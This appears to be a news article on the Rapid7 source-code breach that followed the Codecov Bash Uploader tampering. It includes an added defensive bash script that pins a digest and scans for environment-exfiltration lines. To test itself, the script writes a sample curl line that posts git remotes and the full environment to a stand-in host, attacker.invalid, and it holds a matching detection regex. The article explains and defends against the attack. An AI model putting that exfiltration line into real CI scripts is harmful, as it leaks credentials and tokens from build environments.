As Rapid7 reported, unknown attackers gained access to a small portion of its source code repositories after compromising a software development tool from the startup Codecov.
“An unauthorized party outside Rapid7 has gained unauthorized access to a small subset of our source code repositories for internal tools for our Managed Detection and Response service. These repositories contained some internal credentials that were overridden and alert related data for a subset of our MDR customers,” the Rapid7 notice said.
On April 15, 2021, Codecov, a startup that makes code coverage tools, warned users of its Bash Uploader script that, beginning on January 31, unknown persons had tampered with the script. As later became clear, the incident gave the attackers a foothold in the networks of hundreds of Codecov customers.
The attackers were able to tamper with the script because of an error in Codecov's Docker image creation process, which let them extract the credential needed to modify the Bash Uploader. They then made “periodic unauthorized changes” to the script so that, whenever a user's continuous integration (CI) job ran it, information from that CI environment, including any credentials, tokens or keys exposed as environment variables, was exported to a third-party server outside Codecov's infrastructure. Because the uploader is typically fetched and executed fresh on every build, a single modified copy on the distribution point reached every pipeline that pulled it during that window.
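The check a pipeline owner would want against this class of tampering is to refuse to execute a remotely fetched helper script unless it matches a digest pinned in the repository, and, as a second line of defence, to scan the fetched copy for lines that hand the CI environment to a network client. The script below is an added example written for this article; it is not code from Codecov or Rapid7. The two stand-in scripts it builds, the digest it compares against and the host attacker.invalid are constructed for the demonstration; the exfiltration line is modelled on the published description of the incident, not copied from the real modified uploader.

```bash
#!/usr/bin/env bash
# Added example (not Codecov's or Rapid7's code): two pre-execution checks for a
# remotely fetched CI helper script such as the Bash Uploader.
#   1. compare the file against a SHA-256 digest pinned by the caller
#   2. heuristically scan for lines that ship env/printenv output to curl/wget
# Everything constructed here (sample scripts, digests, host) is for illustration.

# sha256_of FILE: print the hex SHA-256 of FILE (coreutils or macOS fallback).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_script_digest FILE EXPECTED_SHA256
# Returns 0 if FILE hashes to EXPECTED_SHA256, 1 otherwise. Never runs FILE.
verify_script_digest() {
  local file="$1" expected="$2"
  [ "$(sha256_of "$file")" = "$expected" ]
}

# scan_for_env_exfil FILE
# Heuristic: flag any line where a network client is handed the output of
# env or printenv. Prints matching lines with line numbers; returns 1 if any
# line matched, 0 otherwise. A legitimate upload of a coverage file does not
# trip it; a line that dumps the whole environment does.
scan_for_env_exfil() {
  local file="$1"
  if grep -nE '(curl|wget)[^#]*\$\((env|printenv)\)' "$file"; then
    return 1
  fi
  return 0
}

# make_clean_script: write a constructed stand-in for a coverage uploader to a
# temp file and print its path. The endpoint is a placeholder, not Codecov's.
make_clean_script() {
  local f
  f=$(mktemp)
  cat >"$f" <<'EOF'
#!/bin/bash
# constructed stand-in for a coverage uploader (example only)
curl -sm 2 -X POST -d @coverage.xml "https://codecov.example/upload/v4" || true
EOF
  echo "$f"
}

# make_tampered_script: the clean stand-in plus one appended line that posts
# the git remotes and the full environment to an attacker-controlled host.
# The host is constructed; the shape mirrors the incident description.
make_tampered_script() {
  local f
  f=$(make_clean_script)
  echo 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.invalid/upload/v2 || true' >>"$f"
  echo "$f"
}

# run_uploader_safely FILE EXPECTED_SHA256
# Executes FILE only if both checks pass. Exit status: 2 on digest mismatch,
# 3 if the exfiltration scan fires, otherwise the script's own exit status.
run_uploader_safely() {
  local file="$1" expected="$2"
  verify_script_digest "$file" "$expected" \
    || { echo "digest mismatch: refusing to run $file" >&2; return 2; }
  scan_for_env_exfil "$file" >/dev/null \
    || { echo "environment exfiltration pattern found in $file" >&2; return 3; }
  bash "$file"
}

# Demo (only when invoked as: ./check_uploader.sh demo): shows the tampered
# copy being rejected first by the pinned digest, then by the scan alone.
if [ "${1:-}" = "demo" ]; then
  clean=$(make_clean_script)
  tampered=$(make_tampered_script)
  pinned=$(sha256_of "$clean")
  run_uploader_safely "$tampered" "$pinned" || echo "rejected with status $?"
  run_uploader_safely "$tampered" "$(sha256_of "$tampered")" || echo "rejected with status $?"
fi
```

The digest check is the one that actually closes the hole: the scan is only a heuristic and a more careful modification (base64-encoding the environment, or reading specific variables instead of calling `env`) would slip past it. The pinned digest has to live in the consuming repository, not be fetched from the same host as the script, or an attacker who can replace one can replace both. Rotating every credential that was reachable from the CI runner remains necessary after the fact, because the checks above only prevent future runs from leaking.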
According to the Rapid7 notice, there was no evidence that the attackers reached any other corporate systems or production environments, or that any malicious changes were made to the affected repositories. The company said its use of the Bash Uploader was limited to a single CI server dedicated to testing and building some internal tools for the MDR service.